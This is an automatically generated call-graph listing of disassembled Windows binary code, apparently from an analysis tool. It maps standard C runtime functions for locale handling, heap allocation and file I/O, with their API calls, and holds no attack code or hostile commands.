6564->6563 6567 c537e3 6564->6567 6566->6562 6567->6563 6568 c5637d ___endstdio 68 API calls 6567->6568 6569 c537f1 6568->6569 6569->6563 6571 c53ee4 6570->6571 6572 c53eb2 6570->6572 6578 c53f56 6571->6578 6572->6571 6573 c53d86 ___addlocaleref 8 API calls 6572->6573 6574 c53ec5 6573->6574 6574->6571 6581 c53e15 6574->6581 6737 c52193 LeaveCriticalSection 6578->6737 6580 c53f5d 6580->6551 6582 c53e26 InterlockedDecrement 6581->6582 6583 c53ea9 6581->6583 6584 c53e3e 6582->6584 6585 c53e3b InterlockedDecrement 6582->6585 6583->6571 6595 c53c3d 6583->6595 6586 c53e48 InterlockedDecrement 6584->6586 6587 c53e4b 6584->6587 6585->6584 6586->6587 6588 c53e55 InterlockedDecrement 6587->6588 6589 c53e58 6587->6589 6588->6589 6590 c53e62 InterlockedDecrement 6589->6590 6592 c53e65 6589->6592 6590->6592 6591 c53e7e InterlockedDecrement 6591->6592 6592->6591 6593 c53e8e InterlockedDecrement 6592->6593 6594 c53e99 InterlockedDecrement 6592->6594 6593->6592 6594->6583 6596 c53cc1 6595->6596 6598 c53c54 6595->6598 6597 c53d0e 6596->6597 6599 c5637d ___endstdio 68 API calls 6596->6599 6610 c53d35 6597->6610 6649 c57404 6597->6649 6598->6596 6606 c5637d ___endstdio 68 API calls 6598->6606 6621 c53c88 6598->6621 6601 c53ce2 6599->6601 6603 c5637d ___endstdio 68 API calls 6601->6603 6608 c53cf5 6603->6608 6604 c5637d ___endstdio 68 API calls 6609 c53cb6 6604->6609 6605 c5637d ___endstdio 68 API calls 6605->6610 6611 c53c7d 6606->6611 6607 c53d7a 6612 c5637d ___endstdio 68 API calls 6607->6612 6615 c5637d ___endstdio 68 API calls 6608->6615 6616 c5637d ___endstdio 68 API calls 6609->6616 6610->6607 6614 c5637d 68 API calls ___endstdio 6610->6614 6625 c575de 6611->6625 6618 c53d80 6612->6618 6613 c5637d ___endstdio 68 API calls 6619 c53c9e 6613->6619 6614->6610 6620 c53d03 6615->6620 6616->6596 6618->6571 6641 c57599 6619->6641 6623 c5637d ___endstdio 68 API calls 6620->6623 6621->6613 6624 c53ca9 6621->6624 6623->6597 6624->6604 6626 c57668 6625->6626 6627 c575eb 6625->6627 6626->6621 6628 c575fc 6627->6628 6629 c5637d ___endstdio 68 API calls 6627->6629 6630 c5760e 6628->6630 6631 c5637d ___endstdio 68 API calls 6628->6631 6629->6628 6632 c57620 6630->6632 6633 c5637d ___endstdio 68 API calls 6630->6633 6631->6630 6634 c57632 6632->6634 6636 c5637d ___endstdio 68 API calls 6632->6636 6633->6632 6635 c57644 6634->6635 6637 c5637d ___endstdio 68 API calls 6634->6637 6638 c57656 6635->6638 6639 c5637d ___endstdio 68 API calls 6635->6639 6636->6634 6637->6635 6638->6626 6640 c5637d ___endstdio 68 API calls 6638->6640 6639->6638 6640->6626 6642 c575a6 6641->6642 6648 c575da 6641->6648 6643 c5637d ___endstdio 68 API calls 6642->6643 6645 c575b6 6642->6645 6643->6645 6644 c575c8 6647 c5637d ___endstdio 68 API calls 6644->6647 6644->6648 6645->6644 6646 c5637d ___endstdio 68 API calls 6645->6646 6646->6644 6647->6648 6648->6624 6650 c57415 6649->6650 6736 c53d2e 6649->6736 6651 c5637d ___endstdio 68 API calls 6650->6651 6652 c5741d 6651->6652 6653 c5637d ___endstdio 68 API calls 6652->6653 6654 c57425 6653->6654 6655 c5637d ___endstdio 68 API calls 6654->6655 6656 c5742d 6655->6656 6657 c5637d ___endstdio 68 API calls 6656->6657 6658 c57435 6657->6658 6659 c5637d ___endstdio 68 API calls 6658->6659 6660 c5743d 6659->6660 6661 c5637d ___endstdio 68 API calls 6660->6661 6662 c57445 6661->6662 6663 c5637d ___endstdio 68 API calls 6662->6663 6664 c5744c 6663->6664 6665 c5637d ___endstdio 68 API calls 6664->6665 6666 c57454 6665->6666 6667 c5637d ___endstdio 68 API calls 6666->6667 6668 c5745c 6667->6668 6669 c5637d ___endstdio 68 API calls 6668->6669 6670 c57464 6669->6670 6671 c5637d ___endstdio 68 API calls 6670->6671 6672 c5746c 6671->6672 6673 c5637d ___endstdio 68 API calls 6672->6673 6674 c57474 6673->6674 6675 c5637d ___endstdio 68 API calls 6674->6675 6676 c5747c 6675->6676 6677 c5637d ___endstdio 68 API calls 6676->6677 6678 c57484 6677->6678 6679 c5637d ___endstdio 68 API calls 6678->6679 6680 c5748c 6679->6680 6681 c5637d ___endstdio 68 API calls 6680->6681 6682 c57494 6681->6682 6683 c5637d ___endstdio 68 API calls 6682->6683 6684 c5749f 6683->6684 6685 c5637d ___endstdio 68 API calls 6684->6685 6686 c574a7 6685->6686 6687 c5637d ___endstdio 68 API calls 6686->6687 6688 c574af 6687->6688 6689 c5637d ___endstdio 68 API calls 6688->6689 6690 c574b7 6689->6690 6691 c5637d ___endstdio 68 API calls 6690->6691 6692 c574bf 6691->6692 6693 c5637d ___endstdio 68 API calls 6692->6693 6694 c574c7 6693->6694 6695 c5637d ___endstdio 68 API calls 6694->6695 6696 c574cf 6695->6696 6697 c5637d ___endstdio 68 API calls 6696->6697 6698 c574d7 6697->6698 6699 c5637d ___endstdio 68 API calls 6698->6699 6700 c574df 6699->6700 6701 c5637d ___endstdio 68 API calls 6700->6701 6702 c574e7 6701->6702 6703 c5637d ___endstdio 68 API calls 6702->6703 6704 c574ef 6703->6704 6705 c5637d ___endstdio 68 API calls 6704->6705 6706 c574f7 6705->6706 6707 c5637d ___endstdio 68 API calls 6706->6707 6708 c574ff 6707->6708 6709 c5637d ___endstdio 68 API calls 6708->6709 6710 c57507 6709->6710 6711 c5637d ___endstdio 68 API calls 6710->6711 6712 c5750f 6711->6712 6713 c5637d ___endstdio 68 API calls 6712->6713 6714 c57517 6713->6714 6715 c5637d ___endstdio 68 API calls 6714->6715 6716 c57525 6715->6716 6717 c5637d ___endstdio 68 API calls 6716->6717 6718 c57530 6717->6718 6719 c5637d ___endstdio 68 API calls 6718->6719 6720 c5753b 6719->6720 6721 c5637d ___endstdio 68 API calls 6720->6721 6722 c57546 6721->6722 6723 c5637d ___endstdio 68 API calls 6722->6723 6724 c57551 6723->6724 6725 c5637d ___endstdio 68 API calls 6724->6725 6726 c5755c 6725->6726 6727 c5637d ___endstdio 68 API calls 6726->6727 6728 c57567 6727->6728 6729 c5637d ___endstdio 68 API calls 6728->6729 6730 c57572 6729->6730 6731 c5637d ___endstdio 68 API calls 6730->6731 6732 c5757d 6731->6732 6733 c5637d ___endstdio 68 API calls 6732->6733 6734 c57588 6733->6734 6735 c5637d ___endstdio 68 API calls 6734->6735 6735->6736 6736->6605 6737->6580 6741 c52193 LeaveCriticalSection 6738->6741 6740 c53822 6740->6559 6741->6740 6743 c53a91 __setmbcp 6742->6743 6744 c54229 __getptd 68 API calls 6743->6744 6745 c53a9a 6744->6745 6746 c53780 __setmbcp 70 API calls 6745->6746 6747 c53aa4 6746->6747 6773 c53824 6747->6773 6750 c5640b __malloc_crt 68 API calls 6751 c53ac5 6750->6751 6752 c53be4 __setmbcp 6751->6752 6780 c538a0 6751->6780 6752->6518 6755 c53af5 InterlockedDecrement 6757 c53b05 6755->6757 6758 c53b16 InterlockedIncrement 6755->6758 6756 c53bf1 6756->6752 6760 c53c04 6756->6760 6763 c5637d ___endstdio 68 API calls 6756->6763 6757->6758 6762 c5637d ___endstdio 68 API calls 6757->6762 6758->6752 6759 c53b2c 6758->6759 6759->6752 6765 c5226d __lock 68 API calls 6759->6765 6761 c534da __free_osfhnd 68 API calls 6760->6761 6761->6752 6764 c53b15 6762->6764 6763->6760 6764->6758 6767 c53b40 InterlockedDecrement 6765->6767 6768 c53bbc 6767->6768 6769 c53bcf InterlockedIncrement 6767->6769 6768->6769 6771 c5637d ___endstdio 68 API calls 6768->6771 6790 c53be6 6769->6790 6772 c53bce 6771->6772 6772->6769 6774 c515de _LocaleUpdate::_LocaleUpdate 78 API calls 6773->6774 6775 c53838 6774->6775 6776 c53861 6775->6776 6777 c53843 GetOEMCP 6775->6777 6778 c53866 GetACP 6776->6778 6779 c53853 6776->6779 6777->6779 6778->6779 6779->6750 6779->6752 6781 c53824 getSystemCP 80 API calls 6780->6781 6783 c538c0 6781->6783 6782 c538cb setSBCS 6784 c564ea __setmbcp_nolock 5 API calls 6782->6784 6783->6782 6786 c5390f IsValidCodePage 6783->6786 6789 c53934 _memset __setmbcp_nolock 6783->6789 6785 c53a83 6784->6785 6785->6755 6785->6756 6786->6782 6787 c53921 GetCPInfo 6786->6787 6787->6782 6787->6789 6793 c535ed GetCPInfo 6789->6793 6926 c52193 LeaveCriticalSection 6790->6926 6792 c53bed 6792->6752 6794 c536d3 6793->6794 6797 c53621 _memset 6793->6797 6799 c564ea __setmbcp_nolock 5 API calls 6794->6799 6803 c573c2 6797->6803 6801 c5377e 6799->6801 6801->6789 6802 c571c3 ___crtLCMapStringA 103 API calls 6802->6794 6804 c515de _LocaleUpdate::_LocaleUpdate 78 API calls 6803->6804 6805 c573d5 6804->6805 6813 c57208 6805->6813 6808 c571c3 6809 c515de _LocaleUpdate::_LocaleUpdate 78 API calls 6808->6809 6810 c571d6 6809->6810 6879 c56e1e 6810->6879 6814 c57254 6813->6814 6815 c57229 GetStringTypeW 6813->6815 6816 c57241 6814->6816 6818 c5733b 6814->6818 6815->6816 6817 c57249 GetLastError 6815->6817 6819 c5728d MultiByteToWideChar 6816->6819 6828 c57335 6816->6828 6817->6814 6841 c59e63 GetLocaleInfoA 6818->6841 6825 c572ba 6819->6825 6819->6828 6821 c564ea __setmbcp_nolock 5 API calls 6823 c5368e 6821->6823 6823->6808 6824 c572cf _memset __crtLCMapStringA_stat 6824->6828 6831 c57308 MultiByteToWideChar 6824->6831 6825->6824 6829 c51514 _malloc 68 API calls 6825->6829 6826 c5738c GetStringTypeA 6827 c573a7 6826->6827 6826->6828 6832 c5637d ___endstdio 68 API calls 6827->6832 6828->6821 6829->6824 6834 c5732f 6831->6834 6835 c5731e GetStringTypeW 6831->6835 6832->6828 6837 c56dfe 6834->6837 6835->6834 6838 c56e1b 6837->6838 6839 c56e0a 6837->6839 6838->6828 6839->6838 6840 c5637d ___endstdio 68 API calls 6839->6840 6840->6838 6842 c59e96 6841->6842 6843 c59e91 6841->6843 6872 c5a0d7 6842->6872 6845 c564ea __setmbcp_nolock 5 API calls 6843->6845 6846 c5735f 6845->6846 6846->6826 6846->6828 6847 c59eac 6846->6847 6848 c59eec GetCPInfo 6847->6848 6849 c59f76 6847->6849 6850 c59f61 MultiByteToWideChar 6848->6850 6851 c59f03 6848->6851 6852 c564ea __setmbcp_nolock 5 API calls 6849->6852 6850->6849 6856 c59f1c _strlen 6850->6856 6851->6850 6853 c59f09 GetCPInfo 6851->6853 6854 c57380 6852->6854 6853->6850 6855 c59f16 6853->6855 6854->6826 6854->6828 6855->6850 6855->6856 6857 c51514 _malloc 68 API calls 6856->6857 6861 c59f4e _memset __crtLCMapStringA_stat 6856->6861 6857->6861 6858 c59fab MultiByteToWideChar 6859 c59fc3 6858->6859 6860 c59fe2 6858->6860 6863 c59fe7 6859->6863 6864 c59fca WideCharToMultiByte 6859->6864 6862 c56dfe __freea 68 API calls 6860->6862 6861->6849 6861->6858 6862->6849 6865 c5a006 6863->6865 6866 c59ff2 WideCharToMultiByte 6863->6866 6864->6860 6867 c56450 __calloc_crt 68 API calls 6865->6867 6866->6860 6866->6865 6868 c5a00e 6867->6868 6868->6860 6869 c5a017 WideCharToMultiByte 6868->6869 6869->6860 6870 c5a029 6869->6870 6871 c5637d ___endstdio 68 API calls 6870->6871 6871->6860 6875 c5adc7 6872->6875 6876 c5ade0 6875->6876 6877 c5ab98 strtoxl 92 API calls 6876->6877 6878 c5a0e8 6877->6878 6878->6843 6880 c56e3f LCMapStringW 6879->6880 6884 c56e5a 6879->6884 6881 c56e62 GetLastError 6880->6881 6880->6884 6881->6884 6882 c57058 6886 c59e63 __crtLCMapStringA_stat 92 API calls 6882->6886 6883 c56eb4 6885 c56ecd MultiByteToWideChar 6883->6885 6900 c5704f 6883->6900 6884->6882 6884->6883 6893 c56efa 6885->6893 6885->6900 6888 c57080 6886->6888 6887 c564ea __setmbcp_nolock 5 API calls 6889 c536ae 6887->6889 6890 c57174 LCMapStringA 6888->6890 6891 c57099 6888->6891 6888->6900 6889->6802 6905 c570d0 6890->6905 6894 c59eac ___convertcp 75 API calls 6891->6894 6892 c56f4b MultiByteToWideChar 6896 c56f64 LCMapStringW 6892->6896 6920 c57046 6892->6920 6897 c51514 _malloc 68 API calls 6893->6897 6904 c56f13 __crtLCMapStringA_stat 6893->6904 6895 c570ab 6894->6895 6898 c570b5 LCMapStringA 6895->6898 6895->6900 6902 c56f85 6896->6902 6896->6920 6897->6904 6898->6905 6909 c570d7 6898->6909 6899 c5719b 6899->6900 6907 c5637d ___endstdio 68 API calls 6899->6907 6900->6887 6901 c56dfe __freea 68 API calls 6901->6900 6906 c56f8e 6902->6906 6911 c56fb7 6902->6911 6903 c5637d ___endstdio 68 API calls 6903->6899 6904->6892 6904->6900 6905->6899 6905->6903 6908 c56fa0 LCMapStringW 6906->6908 6906->6920 6907->6900 6908->6920 6913 c570e8 _memset __crtLCMapStringA_stat 6909->6913 6915 c51514 _malloc 68 API calls 6909->6915 6910 c57006 LCMapStringW 6916 c57040 6910->6916 6917 c5701e WideCharToMultiByte 6910->6917 6912 c56fd2 __crtLCMapStringA_stat 6911->6912 6914 c51514 _malloc 68 API calls 6911->6914 6912->6910 6912->6920 6913->6905 6919 c57126 LCMapStringA 6913->6919 6914->6912 6915->6913 6918 c56dfe __freea 68 API calls 6916->6918 6917->6916 6918->6920 6921 c57146 6919->6921 6922 c57142 6919->6922 6920->6901 6924 c59eac ___convertcp 75 API calls 6921->6924 6925 c56dfe __freea 68 API calls 6922->6925 6924->6922 6925->6905 6926->6792 6928 c56791 6927->6928 6929 c53f62 __encode_pointer 7 API calls 6928->6929 6930 c567a9 6928->6930 6929->6928 6930->6096 6934 c56738 6931->6934 6933 c56781 6933->6098 6935 c56744 __setmbcp 6934->6935 6942 c53018 6935->6942 6941 c56765 __setmbcp 6941->6933 6943 c5226d __lock 68 API calls 6942->6943 6944 c5301f 6943->6944 6945 c5664d 6944->6945 6946 c53fdd __decode_pointer 6 API calls 6945->6946 6947 c56661 6946->6947 6948 c53fdd __decode_pointer 6 API calls 6947->6948 6949 c56671 6948->6949 6958 c566f4 6949->6958 6965 c59ca0 6949->6965 6951 c5668f 6954 c566b3 6951->6954 6961 c566db 6951->6961 6978 c5649c 6951->6978 6952 c53f62 __encode_pointer 7 API calls 6953 c566e9 6952->6953 6955 c53f62 __encode_pointer 7 API calls 6953->6955 6957 c5649c __realloc_crt 74 API calls 6954->6957 6954->6958 6959 c566c9 6954->6959 6955->6958 6957->6959 6962 c5676e 6958->6962 6959->6958 6960 c53f62 __encode_pointer 7 API calls 6959->6960 6960->6961 6961->6952 7027 c53021 6962->7027 6966 c59cac __setmbcp 6965->6966 6967 c59cbc 6966->6967 6968 c59cd9 6966->6968 6969 c534da __free_osfhnd 68 API calls 6967->6969 6970 c59d1a HeapSize 6968->6970 6971 c5226d __lock 68 API calls 6968->6971 6972 c59cc1 6969->6972 6974 c59cd1 __setmbcp 6970->6974 6975 c59ce9 ___sbh_find_block 6971->6975 6973 c54636 __openfile 6 API calls 6972->6973 6973->6974 6974->6951 6983 c59d3a 6975->6983 6981 c564a5 6978->6981 6980 c564e4 6980->6954 6981->6980 6982 c564c5 Sleep 6981->6982 6987 c5997f 6981->6987 6982->6981 6986 c52193 LeaveCriticalSection 6983->6986 6985 c59d15 6985->6970 6985->6974 6986->6985 6988 c5998b __setmbcp 6987->6988 6989 c599a0 6988->6989 6990 c59992 6988->6990 6992 c599a7 6989->6992 6993 c599b3 6989->6993 6991 c51514 _malloc 68 API calls 6990->6991 7008 c5999a __dosmaperr __setmbcp 6991->7008 6994 c5637d ___endstdio 68 API calls 6992->6994 7000 c59b25 6993->7000 7020 c599c0 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 6993->7020 6994->7008 6995 c59b58 6997 c53532 _realloc 6 API calls 6995->6997 6996 c5226d __lock 68 API calls 6996->7020 6999 c59b5e 6997->6999 6998 c59b2a HeapReAlloc 6998->7000 6998->7008 7001 c534da __free_osfhnd 68 API calls 6999->7001 7000->6995 7000->6998 7002 c59b7c 7000->7002 7003 c53532 _realloc 6 API calls 7000->7003 7006 c59b72 7000->7006 7001->7008 7004 c534da __free_osfhnd 68 API calls 7002->7004 7002->7008 7003->7000 7005 c59b85 GetLastError 7004->7005 7005->7008 7009 c534da __free_osfhnd 68 API calls 7006->7009 7008->6981 7011 c59af3 7009->7011 7010 c59a4b HeapAlloc 7010->7020 7011->7008 7013 c59af8 GetLastError 7011->7013 7012 c59aa0 HeapReAlloc 7012->7020 7013->7008 7014 c52a7f ___sbh_alloc_block 5 API calls 7014->7020 7015 c59b0b 7015->7008 7017 c534da __free_osfhnd 68 API calls 7015->7017 7016 c53532 _realloc 6 API calls 7016->7020 7018 c59b18 7017->7018 7018->7005 7018->7008 7019 c59aee 7021 c534da __free_osfhnd 68 API calls 7019->7021 7020->6995 7020->6996 7020->7008 7020->7010 7020->7012 7020->7014 7020->7015 7020->7016 7020->7019 7022 c522d0 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 7020->7022 7023 c59ac3 7020->7023 7021->7011 7022->7020 7026 c52193 LeaveCriticalSection 7023->7026 7025 c59aca 7025->7020 7026->7025 7030 c52193 LeaveCriticalSection 7027->7030 7029 c53028 7029->6941 7030->7029 7063 c51665 7031->7063 7033 c51029 7034 c51c92 7033->7034 7035 c51c9e __setmbcp 7034->7035 7036 c51cac 7035->7036 7038 c51cda 7035->7038 7037 c534da __free_osfhnd 68 API calls 7036->7037 7039 c51cb1 7037->7039 7536 c5472d 7038->7536 7041 c54636 __openfile 6 API calls 7039->7041 7046 c51cc1 __setmbcp 7041->7046 7046->6109 7048 c51ba6 __setmbcp 7047->7048 7049 c51bb4 7048->7049 7050 c51bd1 7048->7050 7051 c534da __free_osfhnd 68 API calls 7049->7051 7052 c5472d __lock_file 69 API calls 7050->7052 7053 c51bb9 7051->7053 7054 c51bd9 7052->7054 7055 c54636 __openfile 6 API calls 7053->7055 7056 c519fd __ftell_nolock 72 API calls 7054->7056 7059 c51bc9 __setmbcp 7055->7059 7057 c51be5 7056->7057 7615 c51bfe 7057->7615 7059->6111 7618 c5194a 7060->7618 7062 c51080 VirtualProtect 7066 c51671 __setmbcp 7063->7066 7064 c51684 7065 c534da __free_osfhnd 68 API calls 7064->7065 7067 c51689 7065->7067 7066->7064 7068 c516b9 7066->7068 7069 c54636 __openfile 6 API calls 7067->7069 7082 c54ad4 7068->7082 7079 c51699 @_EH4_CallFilterFunc@8 __setmbcp 7069->7079 7071 c516be 7072 c516c5 7071->7072 7073 c516d2 7071->7073 7076 c534da __free_osfhnd 68 API calls 7072->7076 7074 c516f9 7073->7074 7075 c516d9 7073->7075 7100 c5480b 7074->7100 7077 c534da __free_osfhnd 68 API calls 7075->7077 7076->7079 7077->7079 7079->7033 7083 c54ae0 __setmbcp 7082->7083 7084 c5226d __lock 68 API calls 7083->7084 7094 c54aee 7084->7094 7085 c54b63 7125 c54c03 7085->7125 7086 c54b6a 7088 c5640b __malloc_crt 68 API calls 7086->7088 7090 c54b74 7088->7090 7089 c54bf8 __setmbcp 7089->7071 7090->7085 7092 c5631d __alloc_osfhnd InitializeCriticalSectionAndSpinCount 7090->7092 7095 c54b99 7092->7095 7093 c521aa __mtinitlocknum 68 API calls 7093->7094 7094->7085 7094->7086 7094->7093 7128 c5476e 7094->7128 7133 c547dc 7094->7133 7096 c54ba4 7095->7096 7097 c54bb7 EnterCriticalSection 7095->7097 7099 c5637d ___endstdio 68 API calls 7096->7099 7097->7085 7099->7085 7101 c5482d 7100->7101 7102 c54841 7101->7102 7114 c54860 7101->7114 7103 c534da __free_osfhnd 68 API calls 7102->7103 7104 c54846 7103->7104 7105 c54636 __openfile 6 API calls 7104->7105 7111 c51704 7105->7111 7106 c54a73 7108 c534da __free_osfhnd 68 API calls 7106->7108 7107 c54a8d 7140 c58452 7107->7140 7110 c54a78 7108->7110 7112 c54636 __openfile 6 API calls 7110->7112 7122 c5171f 7111->7122 7112->7111 7114->7106 7121 c54a1d 7114->7121 7143 c58821 7114->7143 7118 c5869d __fassign 103 API calls 7119 c54a36 7118->7119 7120 c5869d __fassign 103 API calls 7119->7120 7119->7121 7120->7121 7121->7106 7121->7107 7529 c547a0 7122->7529 7124 c51727 7124->7079 7138 c52193 LeaveCriticalSection 7125->7138 7127 c54c0a 7127->7089 7129 c54791 EnterCriticalSection 7128->7129 7130 c5477b 7128->7130 7129->7094 7131 c5226d __lock 68 API calls 7130->7131 7132 c54784 7131->7132 7132->7094 7134 c547ec 7133->7134 7135 c547ff LeaveCriticalSection 7133->7135 7139 c52193 LeaveCriticalSection 7134->7139 7135->7094 7137 c547fc 7137->7094 7138->7127 7139->7137 7149 c58386 7140->7149 7142 c5846d 7142->7111 7476 c586b7 7143->7476 7145 c549e8 7145->7106 7146 c5869d 7145->7146 7489 c58472 7146->7489 7152 c58392 __setmbcp 7149->7152 7150 c583a5 7151 c534da __free_osfhnd 68 API calls 7150->7151 7153 c583aa 7151->7153 7152->7150 7154 c583e3 7152->7154 7155 c54636 __openfile 6 API calls 7153->7155 7160 c57c67 7154->7160 7159 c583b9 __setmbcp 7155->7159 7159->7142 7161 c57c8c 7160->7161 7225 c5a70b 7161->7225 7164 c57cad 7165 c5450e __invoke_watson 10 API calls 7164->7165 7166 c57cb7 7165->7166 7170 c57cba 7166->7170 7167 c57cf0 7249 c534ed 7167->7249 7170->7167 7175 c57db0 7170->7175 7171 c534da __free_osfhnd 68 API calls 7172 c57cff 7171->7172 7173 c54636 __openfile 6 API calls 7172->7173 7174 c57d0e 7173->7174 7221 c58424 7174->7221 7231 c58c86 7175->7231 7177 c57e52 7178 c57e73 CreateFileA 7177->7178 7179 c57e59 7177->7179 7180 c57ea0 7178->7180 7181 c57f0d GetFileType 7178->7181 7182 c534ed __free_osfhnd 68 API calls 7179->7182 7183 c57ed9 GetLastError 7180->7183 7188 c57eb4 CreateFileA 7180->7188 7184 c57f5e 7181->7184 7185 c57f1a GetLastError 7181->7185 7186 c57e5e 7182->7186 7252 c53500 7183->7252 7257 c58a41 7184->7257 7190 c53500 __dosmaperr 68 API calls 7185->7190 7187 c534da __free_osfhnd 68 API calls 7186->7187 7191 c57e68 7187->7191 7188->7181 7188->7183 7192 c57f43 CloseHandle 7190->7192 7196 c534da __free_osfhnd 68 API calls 7191->7196 7192->7191 7193 c57f51 7192->7193 7195 c534da __free_osfhnd 68 API calls 7193->7195 7197 c57f56 7195->7197 7196->7174 7197->7191 7200 c58309 CloseHandle CreateFileA 7202 c58334 GetLastError 7200->7202 7203 c58211 7200->7203 7206 c53500 __dosmaperr 68 API calls 7202->7206 7203->7174 7204 c534ed __free_osfhnd 68 API calls 7212 c57ff2 7204->7212 7205 c54e8a 78 API calls __read_nolock 7205->7212 7207 c58340 7206->7207 7347 c58ac2 7207->7347 7212->7205 7213 c58204 7212->7213 7214 c57ffa 7212->7214 7216 c5819c 7212->7216 7218 c558ce 70 API calls __lseek_nolock 7212->7218 7322 c59639 7212->7322 7215 c5a4e6 __close_nolock 71 API calls 7213->7215 7214->7212 7219 c589bc 70 API calls __lseeki64_nolock 7214->7219 7276 c5a4e6 7214->7276 7291 c5a330 7214->7291 7217 c5820b 7215->7217 7216->7174 7216->7200 7220 c534da __free_osfhnd 68 API calls 7217->7220 7218->7212 7219->7214 7220->7203 7222 c58429 7221->7222 7224 c58450 7221->7224 7475 c58c5f LeaveCriticalSection 7222->7475 7224->7159 7226 c57ca8 7225->7226 7227 c5a71a 7225->7227 7226->7164 7226->7170 7228 c534da __free_osfhnd 68 API calls 7227->7228 7229 c5a71f 7228->7229 7230 c54636 __openfile 6 API calls 7229->7230 7230->7226 7232 c58c92 __setmbcp 7231->7232 7233 c521aa __mtinitlocknum 68 API calls 7232->7233 7234 c58ca2 7233->7234 7235 c5226d __lock 68 API calls 7234->7235 7236 c58ca7 __setmbcp 7234->7236 7248 c58cb6 7235->7248 7236->7177 7237 c58df9 7369 c58e17 7237->7369 7238 c58d8f 7240 c56450 __calloc_crt 68 API calls 7238->7240 7243 c58d98 7240->7243 7241 c58d37 EnterCriticalSection 7244 c58d47 LeaveCriticalSection 7241->7244 7241->7248 7242 c5226d __lock 68 API calls 7242->7248 7243->7237 7359 c58bbf 7243->7359 7244->7248 7246 c5631d __alloc_osfhnd InitializeCriticalSectionAndSpinCount 7246->7248 7248->7237 7248->7238 7248->7241 7248->7242 7248->7246 7356 c58d59 7248->7356 7250 c541b0 __getptd_noexit 68 API calls 7249->7250 7251 c534f2 7250->7251 7251->7171 7253 c534ed __free_osfhnd 68 API calls 7252->7253 7254 c5350b __dosmaperr 7253->7254 7255 c534da __free_osfhnd 68 API calls 7254->7255 7256 c5351e 7255->7256 7256->7191 7258 c58a4f 7257->7258 7259 c58aa8 7257->7259 7258->7259 7265 c58a73 7258->7265 7260 c534da __free_osfhnd 68 API calls 7259->7260 7261 c58aad 7260->7261 7262 c534ed __free_osfhnd 68 API calls 7261->7262 7263 c57f7c 7262->7263 7263->7212 7263->7216 7266 c558ce 7263->7266 7264 c58a98 SetStdHandle 7264->7263 7265->7263 7265->7264 7377 c58b48 7266->7377 7268 c558dd 7269 c558f3 SetFilePointer 7268->7269 7270 c558e3 7268->7270 7272 c55912 7269->7272 7273 c5590a GetLastError 7269->7273 7271 c534da __free_osfhnd 68 API calls 7270->7271 7274 c558e8 7271->7274 7272->7274 7275 c53500 __dosmaperr 68 API calls 7272->7275 7273->7272 7274->7204 7274->7212 7275->7274 7277 c58b48 __lseeki64_nolock 68 API calls 7276->7277 7279 c5a4f6 7277->7279 7278 c5a54c 7280 c58ac2 __free_osfhnd 69 API calls 7278->7280 7279->7278 7281 c5a52a 7279->7281 7282 c58b48 __lseeki64_nolock 68 API calls 7279->7282 7284 c5a554 7280->7284 7281->7278 7283 c58b48 __lseeki64_nolock 68 API calls 7281->7283 7285 c5a521 7282->7285 7286 c5a536 CloseHandle 7283->7286 7287 c5a576 7284->7287 7290 c53500 __dosmaperr 68 API calls 7284->7290 7288 c58b48 __lseeki64_nolock 68 API calls 7285->7288 7286->7278 7289 c5a542 GetLastError 7286->7289 7287->7214 7288->7281 7289->7278 7290->7287 7390 c589bc 7291->7390 7294 c5a3b2 7296 c534da __free_osfhnd 68 API calls 7294->7296 7304 c5a3bd 7294->7304 7295 c589bc __lseeki64_nolock 70 API calls 7299 c5a36b 7295->7299 7296->7304 7297 c5a44d 7303 c589bc __lseeki64_nolock 70 API calls 7297->7303 7318 c5a4b6 7297->7318 7298 c5a391 GetProcessHeap HeapAlloc 7300 c5a3ad 7298->7300 7311 c5a3c4 __setmode_nolock 7298->7311 7299->7294 7299->7297 7299->7298 7302 c534da __free_osfhnd 68 API calls 7300->7302 7301 c589bc __lseeki64_nolock 70 API calls 7301->7294 7302->7294 7305 c5a466 7303->7305 7304->7214 7305->7294 7306 c58b48 __lseeki64_nolock 68 API calls 7305->7306 7307 c5a47c SetEndOfFile 7306->7307 7308 c5a499 7307->7308 7307->7318 7310 c534da __free_osfhnd 68 API calls 7308->7310 7312 c5a49e 7310->7312 7313 c5a430 7311->7313 7321 c5a407 __setmode_nolock 7311->7321 7400 c58f06 7311->7400 7315 c534ed __free_osfhnd 68 API calls 7312->7315 7314 c534ed __free_osfhnd 68 API calls 7313->7314 7316 c5a435 7314->7316 7317 c5a4a9 GetLastError 7315->7317 7320 c534da __free_osfhnd 68 API calls 7316->7320 7316->7321 7317->7318 7318->7294 7318->7301 7319 c5a415 GetProcessHeap HeapFree 7319->7318 7320->7321 7321->7319 7323 c59645 __setmbcp 7322->7323 7324 c5964d 7323->7324 7325 c59668 7323->7325 7326 c534ed __free_osfhnd 68 API calls 7324->7326 7327 c59676 7325->7327 7330 c596b7 7325->7330 7328 c59652 7326->7328 7329 c534ed __free_osfhnd 68 API calls 7327->7329 7331 c534da __free_osfhnd 68 API calls 7328->7331 7332 c5967b 7329->7332 7333 c58bbf ___lock_fhandle 69 API calls 7330->7333 7342 c5965a __setmbcp 7331->7342 7334 c534da __free_osfhnd 68 API calls 7332->7334 7336 c596bd 7333->7336 7335 c59682 7334->7335 7337 c54636 __openfile 6 API calls 7335->7337 7338 c596e0 7336->7338 7339 c596ca 7336->7339 7337->7342 7341 c534da __free_osfhnd 68 API calls 7338->7341 7340 c58f06 __write_nolock 100 API calls 7339->7340 7343 c596d8 7340->7343 7344 c596e5 7341->7344 7342->7212 7471 c5970b 7343->7471 7345 c534ed __free_osfhnd 68 API calls 7344->7345 7345->7343 7348 c58ad3 7347->7348 7349 c58b2e 7347->7349 7348->7349 7354 c58afe 7348->7354 7350 c534da __free_osfhnd 68 API calls 7349->7350 7351 c58b33 7350->7351 7352 c534ed __free_osfhnd 68 API calls 7351->7352 7353 c58b24 7352->7353 7353->7203 7354->7353 7355 c58b1e SetStdHandle 7354->7355 7355->7353 7372 c52193 LeaveCriticalSection 7356->7372 7358 c58d60 7358->7248 7360 c58bcb __setmbcp 7359->7360 7361 c58c26 7360->7361 7363 c5226d __lock 68 API calls 7360->7363 7362 c58c2b EnterCriticalSection 7361->7362 7364 c58c48 __setmbcp 7361->7364 7362->7364 7365 c58bf7 7363->7365 7364->7237 7366 c58c0e 7365->7366 7368 c5631d __alloc_osfhnd InitializeCriticalSectionAndSpinCount 7365->7368 7373 c58c56 7366->7373 7368->7366 7376 c52193 LeaveCriticalSection 